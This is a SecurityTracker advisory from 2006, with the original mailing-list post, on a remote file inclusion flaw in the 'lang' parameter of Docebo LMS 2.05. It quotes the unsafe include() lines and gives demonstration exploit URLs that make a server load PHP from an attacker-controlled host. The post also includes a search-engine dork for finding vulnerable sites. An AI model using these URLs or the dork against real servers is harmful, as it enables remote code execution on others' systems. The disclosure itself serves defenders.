Docebo Include File Bug in 'lang' Parameter Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1016159
|
|
SecurityTracker URL: http://securitytracker.com/id?1016159
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 25 2006
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2.05
|
Description: Beford reported a vulnerability in Docebo LMS. A remote user can include and execute arbitrary code on the target system.
The 'modules/credits/business.php', 'modules/credits/credits.php', and 'modules/credits/help.php' scripts do not properly validate
user-supplied input in the 'lang' parameter. A remote user can supply a specially crafted URL to cause the target system to include
and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges
of the target web service.
A demonstration exploit URL is provided:
http://[target]/DOCEBO205/modules/credits/help.php?lang=http://[attacker]/?
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.docebolms.org/doceboCms/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: beford <xbefordx@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 25 May 2006 15:15:12 -0500
From: beford <xbefordx@gmail.com>
Subject: Docebo LMS 2.05 Remote File Include
|
Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>
Noobs: %22Based+on+DoceboLMS+2.0%22
Vulnerable Files
doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');
http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?
|
|